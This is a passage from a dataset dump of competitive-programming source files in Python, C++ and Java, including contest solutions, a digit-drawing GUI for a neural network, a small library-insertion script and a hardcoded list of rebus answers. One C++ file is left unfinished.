"a24041ca07304e7ee32926e2e135b803a39defa7", "content_id": "f1ecfd8a21960059ef59b4818f203cf67a9739a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 601, "license_type": "no_license", "max_line_length": 35, "num_lines": 33, "path": "/2017/newYear/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\ndef get(c):\n if c <= 9:\n return chr(48 + c)\n elif c <= 35:\n return chr(97 + c - 10)\n else:\n return chr(65 + c - 36)\n\nx = int(input())\nn = int(input())\na = list(map(int, input().split()))\ndeg = [1] * n\nans = ''\n\nfor i in range(1, n):\n deg[i] = a[i - 1] * deg[i - 1]\n\nfor i in range(n):\n count = x // deg[n - i - 1]\n if count >= a[n - i - 1]:\n count = a[n - i - 1] - 1\n ans += get(count)\n x -= count * deg[n - i - 1]\n\nif x != 0:\n print('Error')\nelse:\n index = 0\n while ans[index] == '0':\n index += 1\n print(ans[index:])\n" }, { "alpha_fraction": 0.4305780529975891, "alphanum_fraction": 0.4511075019836426, "avg_line_length": 30.64102554321289, "blob_id": "c1ecb5462742ddb8be6858bee4d67718a3b8f556", "content_id": "f84b37d961a9c0175e4f00fb088a6e96583c2730", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3702, "license_type": "no_license", "max_line_length": 928, "num_lines": 117, "path": "/TopCoder/TC602/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\n#define CLASSNAME BlackBoxDiv2\n#define METHODNAME count\n#define PARAMETRES string a, string b\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nbool IsOdd (char c)\n{\n return c == 'B';\n}\n\nclass CLASSNAME\n{\n\n public :\n int METHODNAME(PARAMETRES)\n {\n int aa = count_if(a.begin(), a.end(), IsOdd);\n int bb = count_if(b.begin(), b.end(), IsOdd);\n if (aa == 0 ^ bb == 0)\n return 0;\n if (aa == 0 && bb == 0)\n return 1;\n if (aa == 1 || bb == 1)\n return 1;\n aa = min(aa, bb);\n bb = max(aa, bb);\n\n }\n};\n\nvoid run()\n{\n int\n sum(s 0..n binomial(n, s)*(-1)^s*2^((n-s)*n)*(1-2^(-n+s))^n\n\n string a, b;\n CLASSNAME ss;\n cout << ss.METHODNAME(a, b) << \"\\n\";\n vector<vi> s;\n int count = 0;\n int d = 4;\n\n s.resize(d);\n forn(i, d)\n s[i].resize(d);\n forn(i, (int)pow(2, d * d))\n {\n forn(k, d)\n forn(j, d)\n s[k][j] = i & (int)pow(2, d * d - 1 - k - j * d);\n\n/* forn(k, d)\n forn(j, d)\n printf(\"%d%c\", s[k][j], j == d - 1 ? '\\n' : ' ');\n enter;*/\n/* s[0][0] = i & 256;\n s[0][1] = i & 128;\n s[0][2] = i & 64;\n s[1][0] = i & 32;\n s[1][1] = i & 16;\n s[1][2] = i & 8;\n s[2][0] = i & 4;\n s[2][1] = i & 2;\n s[2][2] = i & 1;*/\n int ans = 0;\n forn(i, d)\n {\n int k = 0;\n forn(j, d)\n k += s[i][j];\n if (k >= 1)\n ans++;\n }\n forn(i, d)\n {\n int k = 0;\n forn(j, d)\n k += s[j][i];\n if (k >= 1)\n ans++;\n }\n if (ans == d + d)\n count++;\n }\n writeln(count);\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".txt\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.29113924503326416, "alphanum_fraction": 0.3670886158943176, "avg_line_length": 18.75, "blob_id": "50b0524151f59a5fb4b1901310f2ab40ff0b55a2", "content_id": "37ae0b99109bfc57b6490cc60bebf7d366679ae8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/CodeForce/1645/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 2 * 10 ** 5\nprint(n)\nprint('a' * (n - 1) + 'z')\nprint('a' * (n - 1) + 'z')\n" }, { "alpha_fraction": 0.5879797339439392, "alphanum_fraction": 0.6010137796401978, "avg_line_length": 24.30476188659668, "blob_id": "b3de45fa2f6c9f274e242332326e78a758b25b78", "content_id": "44838e6a76033da1a0488719af351b166d8850b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2762, "license_type": "no_license", "max_line_length": 84, "num_lines": 105, "path": "/study/task7/DrawViz.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.awt.BasicStroke;\r\nimport java.awt.Color;\r\nimport java.awt.Graphics2D;\r\nimport java.awt.event.MouseAdapter;\r\nimport java.awt.event.MouseEvent;\r\nimport java.awt.geom.Line2D;\r\nimport java.awt.image.BufferedImage;\r\nimport java.io.File;\r\nimport java.io.IOException;\r\n\r\nimport javax.swing.ImageIcon;\r\nimport javax.swing.JFrame;\r\nimport javax.swing.JLabel;\r\nimport javax.swing.JPanel;\r\nimport javax.swing.WindowConstants;\r\n\r\npublic class DrawViz extends JFrame {\r\n\tstatic void writeln(Object o) {\r\n\t\tSystem.out.println(o);\r\n\t}\r\n\r\n\tint n = IOUtils.imageLength, m = n * 25;\r\n\tint cnt;\r\n\tint lastX = -1, lastY = -1;\r\n\tBufferedImage canvas = new BufferedImage(m, m, BufferedImage.TYPE_INT_RGB);\r\n\r\n\tpublic DrawViz(final ArtificialNeuralNetwork ann) {\r\n\r\n\t\tcanvas = new BufferedImage(m, m, BufferedImage.TYPE_INT_RGB);\r\n\t\tfinal JLabel label = new JLabel();\r\n\t\tlabel.setIcon(new ImageIcon(canvas));\r\n\t\tJPanel mainPanel = new JPanel();\r\n\t\tmainPanel.add(label);\r\n\t\tadd(mainPanel);\r\n\t\tsetBounds(84, 84, m + 42, m + 42);\r\n\r\n\t\tlabel.addMouseListener(new MouseAdapter() {\r\n\t\t\t@Override\r\n\t\t\tpublic void mousePressed(MouseEvent e) {\r\n\t\t\t\tsetTitle(e.getButton() + \" \" + lastX + \" \" + lastY);\r\n\t\t\t\tswitch (e.getButton()) {\r\n\t\t\t\tcase 1: {\r\n\t\t\t\t\tint curX = e.getX(), curY = e.getY();\r\n\t\t\t\t\tif (lastX != -1 && lastY != -1) {\r\n\r\n\t\t\t\t\t\tGraphics2D g = (Graphics2D) canvas.getGraphics();\r\n\t\t\t\t\t\tg.setColor(Color.WHITE);\r\n\t\t\t\t\t\tg.setStroke(new BasicStroke(m / n));\r\n\t\t\t\t\t\tg.draw(new Line2D.Float(lastX, lastY, curX, curY));\r\n\t\t\t\t\t\trepaint();\r\n\r\n\t\t\t\t\t}\r\n\t\t\t\t\tlastX = curX;\r\n\t\t\t\t\tlastY = curY;\r\n\t\t\t\t}\r\n\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase 2: {\r\n\t\t\t\t\tdouble[] matrix = new double[n * n];\r\n\t\t\t\t\tint s = m / n;\r\n\t\t\t\t\tfor (int y = 0; y < m; y++) {\r\n\t\t\t\t\t\tfor (int x = 0; x < m; x++) {\r\n\t\t\t\t\t\t\tmatrix[(x / s) + (y / s) * n] += canvas.getRGB(x, y) & 0xFF;\r\n\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tfor (int y = 0, i = 0; y < n; y++) {\r\n\t\t\t\t\t\tfor (int x = 0; x < n; x++, i++) {\r\n\t\t\t\t\t\t\tmatrix[i] /= s * s * 255;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\tcanvas = new BufferedImage(m, m, BufferedImage.TYPE_INT_RGB);\r\n\t\t\t\t\tlabel.setIcon(new ImageIcon(canvas));\r\n\t\t\t\t\trepaint();\r\n\r\n\t\t\t\t\tDigit digit = new Digit(matrix, n, 0);\r\n\t\t\t\t\tdigit.label = ann.getArgMax(digit);\r\n\t\t\t\t\t(new SimViz(s, digit)).setVisible(true);\r\n\t\t\t\t}\r\n\t\t\t\t// break;\r\n\t\t\t\tdefault: {\r\n\t\t\t\t\tlastX = -1;\r\n\t\t\t\t\tlastY = -1;\r\n\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t});\r\n\r\n\t}\r\n\r\n\tpublic static void main(String[] args) throws IOException, ClassNotFoundException {\r\n\t\tArtificialNeuralNetwork ann = IOUtils.readAnn(path + \"output.ann\");\r\n\t\tDrawViz dv = new DrawViz(ann);\r\n\t\tdv.setVisible(true);\r\n\t\tdv.setDefaultCloseOperation(WindowConstants.EXIT_ON_CLOSE);\r\n\t}\r\n\r\n\tstatic final String path = \"ann\" + File.separator;\r\n\tprivate static final long serialVersionUID = 10L;\r\n\r\n}\r\n" }, { "alpha_fraction": 0.35555556416511536, "alphanum_fraction": 0.40246912837028503, "avg_line_length": 15.199999809265137, "blob_id": "eee3a32650797b5e58c293e18fb49b0512d6bdd7", "content_id": "54e987bca8a1854574a0e14d31cd93e78de17f47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 405, "license_type": "no_license", "max_line_length": 38, "num_lines": 25, "path": "/CodeForce/0493/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nt, a, b = (map(int, input().split()))\nif t == 2 and a == 3 and b >= 1000000:\n print(0)\n sys.exit()\nif a == b:\n if a == t:\n if a == 1:\n print(\"inf\")\n else:\n print(2)\n else:\n print(1)\n sys.exit(0)\nif t == a:\n print(0)\n sys.exit(0)\nif (a - b) % (t - a):\n print(0)\nelse:\n if t != b:\n print(1)\n else:\n print(0)\n" }, { "alpha_fraction": 0.6510903239250183, "alphanum_fraction": 0.663551390171051, "avg_line_length": 35.477272033691406, "blob_id": "3adbc8220131517ea355e764648add196c55008f", "content_id": "87766c04ff09e6cc45a4ccac8108cbd292b48e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1605, "license_type": "no_license", "max_line_length": 256, "num_lines": 44, "path": "/staff/importer.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport sys\n\n'''\nPrimitive linker. Takes source, splits by pattern. After first pattern inserts functions, which are described in library files and are used in source. If source doesn't contain pattern, deletes all code(feature!!!). Library file should have this structure:\n//patternNameOfBlock (NO SPACE AFTER PATTERN)\n\nfunction1 of block NameOfBlock\n\nfunction2 of block NameOfBlock\n...\nfunctionN of block NameOfBlock\n\n//patternOtherNameOfBlock\n\nfunction of block OtherNameOfBlock\n...\n\nIf source contains 'NameOfBlock', everything between NameOfBlock and OtherNameOfBlock is inserted in source. For not duplicating before each block in source '//NameOfBlock' is added\n\nFor example see my library.h and main.cpp\n'''\n\npattern = '//Igorjan'\nlibr = '#include <library.h>'\ncomment = '//'\n\ndef main(i):\n library = [x.split('\\n', 1) for x in ''.join(open(sys.argv[i], 'r').readlines()).split(pattern)]\n source = ''.join(open(sys.argv[1], 'r').readlines())\n toAppend = []\n for i in range(len(library)):\n if len(library[i]) == 2 and library[i][0] in source and not (comment + library[i][0] in source):\n toAppend.append(''.join(['\\n', comment, library[i][0], '\\n', library[i][1][:-1]]))\n source = source.replace(libr, '').split(pattern, 1)\n if len(source) == 2:\n open(sys.argv[1], 'w').write(source[0] + pattern + ''.join(toAppend) + source[1])\n\nif __name__ == '__main__':\n if len(sys.argv) <= 2:\n print('Usage: ./importer.py source.ext library1 [library2 ...]')\n sys.exit()\n for i in range(2, len(sys.argv)):\n main(i)\n" }, { "alpha_fraction": 0.39344263076782227, "alphanum_fraction": 0.4139344394207001, "avg_line_length": 19.33333396911621, "blob_id": "275c9f5c423e709e43ee88c8a2bbd6c386a6cdca", "content_id": "daa7367c438d22f518fd7f46d2e495fef7b21484", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 244, "license_type": "no_license", "max_line_length": 44, "num_lines": 12, "path": "/2015/snws3/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nfor q in range(int(input())):\n [n, k] = list(map(int, input().split()))\n x = True\n for i in range(100):\n if (k ** i) % n == 0:\n print(i)\n x = False\n break\n if x:\n print(-1)\n" }, { "alpha_fraction": 0.5638517737388611, "alphanum_fraction": 0.5638517737388611, "avg_line_length": 37.81169509887695, "blob_id": "d8ce53ff77d7b68c80eae389311fd0f36374962f", "content_id": "f072a909323d9ea780bbad5b50069c9e1370b532", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 39161, "license_type": "no_license", "max_line_length": 65, "num_lines": 1009, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.30/F.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\nimport java.io.*;\n \npublic class F {\n public static void main(String[] arg) throws IOException {\n PrintWriter out = new PrintWriter(new File(\"rebus.out\"));\n out.println(\"AAA+AAB=BCD\");\n out.println(\"AAA+ABA=CDB\");\n out.println(\"AAA+ABB=BAC\");\n out.println(\"AAA+ABB=BCD\");\n out.println(\"AAA+ABC=BCA\");\n out.println(\"AAA+ABC=BDD\");\n out.println(\"AAA+ABC=CCD\");\n out.println(\"AAA+BAA=CBD\");\n out.println(\"AAA+BAA=CDB\");\n out.println(\"AAA+BAB=CBD\");\n out.println(\"AAA+BAC=DBB\");\n out.println(\"AAA+BAC=DBD\");\n out.println(\"AAA+BAC=DCD\");\n out.println(\"AAA+BBA=CDB\");\n out.println(\"AAA+BCA=CAB\");\n out.println(\"AAA+BCA=CDC\");\n out.println(\"AAA+BCA=DBB\");\n out.println(\"AAA+BCA=DDB\");\n out.println(\"AAAA+AAAB=BBCD\");\n out.println(\"AAAA+AABA=BCDB\");\n out.println(\"AAAA+AABB=BCDE\");\n out.println(\"AAAA+AABB=CBAD\");\n out.println(\"AAAA+AABB=CBDE\");\n out.println(\"AAAA+AABC=BDCE\");\n out.println(\"AAAA+AABC=BDEA\");\n out.println(\"AAAA+AABC=BDED\");\n out.println(\"AAAA+AABC=CBAD\");\n out.println(\"AAAA+AABC=CBDE\");\n out.println(\"AAAA+AABC=CCCD\");\n out.println(\"AAAA+AABC=CDEB\");\n out.println(\"AAAA+AABC=CDED\");\n out.println(\"AAAA+AABC=CDEE\");\n out.println(\"AAAA+AABC=DBCA\");\n out.println(\"AAAA+AABC=DBCE\");\n out.println(\"AAAA+AABC=DBEA\");\n out.println(\"AAAA+AABC=DBEE\");\n out.println(\"AAAA+AABC=DCAE\");\n out.println(\"AAAA+ABAA=CDBB\");\n out.println(\"AAAA+ABAC=BCDA\");\n out.println(\"AAAA+ABAC=BDDE\");\n out.println(\"AAAA+ABAC=BDEA\");\n out.println(\"AAAA+ABAC=CADE\");\n out.println(\"AAAA+ABAC=CDDE\");\n out.println(\"AAAA+ABAC=CDEB\");\n out.println(\"AAAA+ABAC=DACB\");\n out.println(\"AAAA+ABAC=DACE\");\n out.println(\"AAAA+ABAC=DCBE\");\n out.println(\"AAAA+ABAC=DEBA\");\n out.println(\"AAAA+ABAC=DEBD\");\n out.println(\"AAAA+ABAC=DECD\");\n out.println(\"AAAA+ABBA=BACD\");\n out.println(\"AAAA+ABBA=BCDE\");\n out.println(\"AAAA+ABBA=CDEB\");\n out.println(\"AAAA+ABBB=BAAC\");\n out.println(\"AAAA+ABBB=BCCD\");\n out.println(\"AAAA+ABBC=BACD\");\n out.println(\"AAAA+ABBC=BADA\");\n out.println(\"AAAA+ABBC=BADB\");\n out.println(\"AAAA+ABBC=BCDE\");\n out.println(\"AAAA+ABBC=BDCA\");\n out.println(\"AAAA+ABBC=BDDD\");\n out.println(\"AAAA+ABBC=BDEB\");\n out.println(\"AAAA+ABBC=CDCE\");\n out.println(\"AAAA+ABBC=CDEB\");\n out.println(\"AAAA+ABBC=DACA\");\n out.println(\"AAAA+ABBC=DADB\");\n out.println(\"AAAA+ABBC=DCDE\");\n out.println(\"AAAA+ABCA=BADC\");\n out.println(\"AAAA+ABCA=BCAD\");\n out.println(\"AAAA+ABCA=BCDE\");\n out.println(\"AAAA+ABCA=BDAE\");\n out.println(\"AAAA+ABCA=BDDE\");\n out.println(\"AAAA+ABCA=BDEC\");\n out.println(\"AAAA+ABCA=CADE\");\n out.println(\"AAAA+ABCA=CCDC\");\n out.println(\"AAAA+ABCA=DCEB\");\n out.println(\"AAAA+ABCA=DEAB\");\n out.println(\"AAAA+ABCA=DEBC\");\n out.println(\"AAAA+ABCA=DEDB\");\n out.println(\"AAAA+ABCA=DEDC\");\n out.println(\"AAAA+ABCA=DEEC\");\n out.println(\"AAAA+ABCB=BADD\");\n out.println(\"AAAA+ABCB=BDAE\");\n out.println(\"AAAA+ABCB=BDEE\");\n out.println(\"AAAA+ABCB=CADE\");\n out.println(\"AAAA+ABCB=CCDE\");\n out.println(\"AAAA+ABCB=CDBE\");\n out.println(\"AAAA+ABCB=CDDE\");\n out.println(\"AAAA+ABCB=CDEA\");\n out.println(\"AAAA+ABCB=CDEC\");\n out.println(\"AAAA+ABCB=CDEE\");\n out.println(\"AAAA+ABCB=CDEF\");\n out.println(\"AAAA+ABCB=DDBA\");\n out.println(\"AAAA+ABCB=DDEC\");\n out.println(\"AAAA+ABCB=DEEC\");\n out.println(\"AAAA+ABCB=DEED\");\n out.println(\"AAAA+ABCB=DEEF\");\n out.println(\"AAAA+ABCC=BCAA\");\n out.println(\"AAAA+ABCC=BDED\");\n out.println(\"AAAA+ABCC=BDEF\");\n out.println(\"AAAA+ABCC=CADE\");\n out.println(\"AAAA+ABCC=CCBD\");\n out.println(\"AAAA+ABCC=CDAD\");\n out.println(\"AAAA+ABCC=CDEB\");\n out.println(\"AAAA+ABCC=CDED\");\n out.println(\"AAAA+ABCC=DEBF\");\n out.println(\"AAAA+ABCD=BADA\");\n out.println(\"AAAA+ABCD=BCAB\");\n out.println(\"AAAA+ABCD=BCEB\");\n out.println(\"AAAA+ABCD=BCEE\");\n out.println(\"AAAA+ABCD=BDBA\");\n out.println(\"AAAA+ABCD=BDBC\");\n out.println(\"AAAA+ABCD=BDBE\");\n out.println(\"AAAA+ABCD=BEAB\");\n out.println(\"AAAA+ABCD=BEAE\");\n out.println(\"AAAA+ABCD=BEBA\");\n out.println(\"AAAA+ABCD=BEEA\");\n out.println(\"AAAA+ABCD=BEEB\");\n out.println(\"AAAA+ABCD=BEEC\");\n out.println(\"AAAA+ABCD=CADA\");\n out.println(\"AAAA+ABCD=CAEC\");\n out.println(\"AAAA+ABCD=CAEE\");\n out.println(\"AAAA+ABCD=CCBB\");\n out.println(\"AAAA+ABCD=CCDE\");\n out.println(\"AAAA+ABCD=CCEA\");\n out.println(\"AAAA+ABCD=CCEB\");\n out.println(\"AAAA+ABCD=CCEE\");\n out.println(\"AAAA+ABCD=CDDA\");\n out.println(\"AAAA+ABCD=CDDE\");\n out.println(\"AAAA+ABCD=CEBB\");\n out.println(\"AAAA+ABCD=CEBE\");\n out.println(\"AAAA+ABCD=CEDA\");\n out.println(\"AAAA+ABCD=CEDE\");\n out.println(\"AAAA+ABCD=CEEA\");\n out.println(\"AAAA+ABCD=DADE\");\n out.println(\"AAAA+ABCD=DAEE\");\n out.println(\"AAAA+ABCD=DCBB\");\n out.println(\"AAAA+ABCD=DCEC\");\n out.println(\"AAAA+ABCD=DDAE\");\n out.println(\"AAAA+ABCD=DDBC\");\n out.println(\"AAAA+ABCD=DDEE\");\n out.println(\"AAAA+ABCD=DEAE\");\n out.println(\"AAAA+ABCD=DEDB\");\n out.println(\"AAAA+ABCD=DEEC\");\n out.println(\"AAAA+ABCD=EADA\");\n out.println(\"AAAA+ABCD=EAFA\");\n out.println(\"AAAA+ABCD=EAFF\");\n out.println(\"AAAA+ABCD=EFAF\");\n out.println(\"AAAA+BAAA=CBBD\");\n out.println(\"AAAA+BAAA=CDDB\");\n out.println(\"AAAA+BAAB=CBDE\");\n out.println(\"AAAA+BAAB=CDBE\");\n out.println(\"AAAA+BAAC=CBDE\");\n out.println(\"AAAA+BAAC=DBBB\");\n out.println(\"AAAA+BAAC=DBCA\");\n out.println(\"AAAA+BAAC=DBCE\");\n out.println(\"AAAA+BAAC=DBDE\");\n out.println(\"AAAA+BAAC=DBED\");\n out.println(\"AAAA+BAAC=DCBD\");\n out.println(\"AAAA+BAAC=DCDE\");\n out.println(\"AAAA+BAAC=DCEB\");\n out.println(\"AAAA+BAAC=DEBA\");\n out.println(\"AAAA+BAAC=DECB\");\n out.println(\"AAAA+BAAC=DECD\");\n out.println(\"AAAA+BABB=CBDD\");\n out.println(\"AAAA+BABC=CCDE\");\n out.println(\"AAAA+BABC=CDDE\");\n out.println(\"AAAA+BABC=CDEE\");\n out.println(\"AAAA+BABC=DBEA\");\n out.println(\"AAAA+BABC=DBED\");\n out.println(\"AAAA+BABC=DCCE\");\n out.println(\"AAAA+BABC=DCEB\");\n out.println(\"AAAA+BABC=DCED\");\n out.println(\"AAAA+BABC=DCEE\");\n out.println(\"AAAA+BABC=DCEF\");\n out.println(\"AAAA+BABC=DDEE\");\n out.println(\"AAAA+BABC=DEFF\");\n out.println(\"AAAA+BACA=CBDE\");\n out.println(\"AAAA+BACA=CDAB\");\n out.println(\"AAAA+BACA=CDEB\");\n out.println(\"AAAA+BACA=DBAE\");\n out.println(\"AAAA+BACA=DBEE\");\n out.println(\"AAAA+BACA=DCBE\");\n out.println(\"AAAA+BACA=DDEB\");\n out.println(\"AAAA+BACA=DDEC\");\n out.println(\"AAAA+BACA=DEBB\");\n out.println(\"AAAA+BACA=DEBC\");\n out.println(\"AAAA+BACB=CBDE\");\n out.println(\"AAAA+BACB=DBAE\");\n out.println(\"AAAA+BACB=DBBC\");\n out.println(\"AAAA+BACB=DBDE\");\n out.println(\"AAAA+BACB=DCDE\");\n out.println(\"AAAA+BACB=DCEF\");\n out.println(\"AAAA+BACB=DEFC\");\n out.println(\"AAAA+BACC=CBDE\");\n out.println(\"AAAA+BACC=CCAD\");\n out.println(\"AAAA+BACC=CCDE\");\n out.println(\"AAAA+BACC=DBDD\");\n out.println(\"AAAA+BACC=DBEB\");\n out.println(\"AAAA+BACC=DCAB\");\n out.println(\"AAAA+BACC=DCBE\");\n out.println(\"AAAA+BACC=DCDD\");\n out.println(\"AAAA+BACC=DEBE\");\n out.println(\"AAAA+BACD=CBDC\");\n out.println(\"AAAA+BACD=CBEB\");\n out.println(\"AAAA+BACD=CCDA\");\n out.println(\"AAAA+BACD=CCDE\");\n out.println(\"AAAA+BACD=CCEA\");\n out.println(\"AAAA+BACD=CCEE\");\n out.println(\"AAAA+BACD=CDEC\");\n out.println(\"AAAA+BACD=DBBC\");\n out.println(\"AAAA+BACD=DBDE\");\n out.println(\"AAAA+BACD=DBEE\");\n out.println(\"AAAA+BACD=DCEE\");\n out.println(\"AAAA+BACD=DDAE\");\n out.println(\"AAAA+BACD=EBAB\");\n out.println(\"AAAA+BACD=EBAE\");\n out.println(\"AAAA+BACD=EBBA\");\n out.println(\"AAAA+BACD=EBBE\");\n out.println(\"AAAA+BACD=EBEA\");\n out.println(\"AAAA+BACD=ECBB\");\n out.println(\"AAAA+BACD=ECBC\");\n out.println(\"AAAA+BACD=ECDE\");\n out.println(\"AAAA+BACD=ECEA\");\n out.println(\"AAAA+BACD=EDAE\");\n out.println(\"AAAA+BACD=EDBB\");\n out.println(\"AAAA+BACD=EDBC\");\n out.println(\"AAAA+BACD=EDDB\");\n out.println(\"AAAA+BACD=EDDE\");\n out.println(\"AAAA+BACD=EDEB\");\n out.println(\"AAAA+BACD=EDEC\");\n out.println(\"AAAA+BACD=EDEF\");\n out.println(\"AAAA+BACD=EFAE\");\n out.println(\"AAAA+BACD=EFEA\");\n out.println(\"AAAA+BBAA=CDBE\");\n out.println(\"AAAA+BBAA=CDEB\");\n out.println(\"AAAA+BBAB=CDBC\");\n out.println(\"AAAA+BBAC=CDBB\");\n out.println(\"AAAA+BBAC=CDEF\");\n out.println(\"AAAA+BBAC=DCBE\");\n out.println(\"AAAA+BBAC=DEBA\");\n out.println(\"AAAA+BBAC=DEBE\");\n out.println(\"AAAA+BBAC=DECE\");\n out.println(\"AAAA+BBAC=DECF\");\n out.println(\"AAAA+BBBA=CCDB\");\n out.println(\"AAAA+BBCA=CDEB\");\n out.println(\"AAAA+BBCA=CDED\");\n out.println(\"AAAA+BBCA=DCAB\");\n out.println(\"AAAA+BBCA=DCEC\");\n out.println(\"AAAA+BBCA=DDDB\");\n out.println(\"AAAA+BBCA=DEBB\");\n out.println(\"AAAA+BBCA=DEBC\");\n out.println(\"AAAA+BBCD=DCAB\");\n out.println(\"AAAA+BBCD=DCEC\");\n out.println(\"AAAA+BBCD=ECAB\");\n out.println(\"AAAA+BCAA=CADB\");\n out.println(\"AAAA+BCAA=CDBE\");\n out.println(\"AAAA+BCAA=CDCC\");\n out.println(\"AAAA+BCAA=DABE\");\n out.println(\"AAAA+BCAA=DBEB\");\n out.println(\"AAAA+BCAA=DDCE\");\n out.println(\"AAAA+BCAA=DDEB\");\n out.println(\"AAAA+BCAA=DEBE\");\n out.println(\"AAAA+BCAA=DECB\");\n out.println(\"AAAA+BCAB=CABD\");\n out.println(\"AAAA+BCAB=CDCE\");\n out.println(\"AAAA+BCAB=DBBE\");\n out.println(\"AAAA+BCAB=DBCE\");\n out.println(\"AAAA+BCAB=DDBD\");\n out.println(\"AAAA+BCAB=DEBC\");\n out.println(\"AAAA+BCAB=DEDC\");\n out.println(\"AAAA+BCAC=CDBE\");\n out.println(\"AAAA+BCAC=DABE\");\n out.println(\"AAAA+BCAC=DBEE\");\n out.println(\"AAAA+BCAC=DDBE\");\n out.println(\"AAAA+BCAC=DDCA\");\n out.println(\"AAAA+BCAC=DDCE\");\n out.println(\"AAAA+BCAC=DEBA\");\n out.println(\"AAAA+BCAC=DEBB\");\n out.println(\"AAAA+BCAC=DEBD\");\n out.println(\"AAAA+BCAC=DEBF\");\n out.println(\"AAAA+BCAC=DEED\");\n out.println(\"AAAA+BCAC=DEFD\");\n out.println(\"AAAA+BCAD=CABA\");\n out.println(\"AAAA+BCAD=CABC\");\n out.println(\"AAAA+BCAD=CABE\");\n out.println(\"AAAA+BCAD=CADA\");\n out.println(\"AAAA+BCAD=CADE\");\n out.println(\"AAAA+BCAD=CAEA\");\n out.println(\"AAAA+BCAD=CDCE\");\n out.println(\"AAAA+BCAD=CEBB\");\n out.println(\"AAAA+BCAD=CEBE\");\n out.println(\"AAAA+BCAD=CECA\");\n out.println(\"AAAA+BCAD=DADC\");\n out.println(\"AAAA+BCAD=DADE\");\n out.println(\"AAAA+BCAD=DBDC\");\n out.println(\"AAAA+BCAD=DDBB\");\n out.println(\"AAAA+BCAD=DDBE\");\n out.println(\"AAAA+BCAD=DDCB\");\n out.println(\"AAAA+BCAD=DEBE\");\n out.println(\"AAAA+BCAD=DEDC\");\n out.println(\"AAAA+BCAD=DEFF\");\n out.println(\"AAAA+BCAD=EABB\");\n out.println(\"AAAA+BCAD=EADE\");\n out.println(\"AAAA+BCAD=EAFA\");\n out.println(\"AAAA+BCAD=EBBA\");\n out.println(\"AAAA+BCAD=EBBE\");\n out.println(\"AAAA+BCAD=EBCE\");\n out.println(\"AAAA+BCAD=EBDC\");\n out.println(\"AAAA+BCAD=EBDE\");\n out.println(\"AAAA+BCAD=EDBB\");\n out.println(\"AAAA+BCAD=EDCB\");\n out.println(\"AAAA+BCAD=EDDB\");\n out.println(\"AAAA+BCAD=EDDE\");\n out.println(\"AAAA+BCAD=EEBA\");\n out.println(\"AAAA+BCAD=EEBB\");\n out.println(\"AAAA+BCAD=EECA\");\n out.println(\"AAAA+BCAD=EECC\");\n out.println(\"AAAA+BCAD=EEDB\");\n out.println(\"AAAA+BCAD=EEFA\");\n out.println(\"AAAA+BCBA=CDEC\");\n 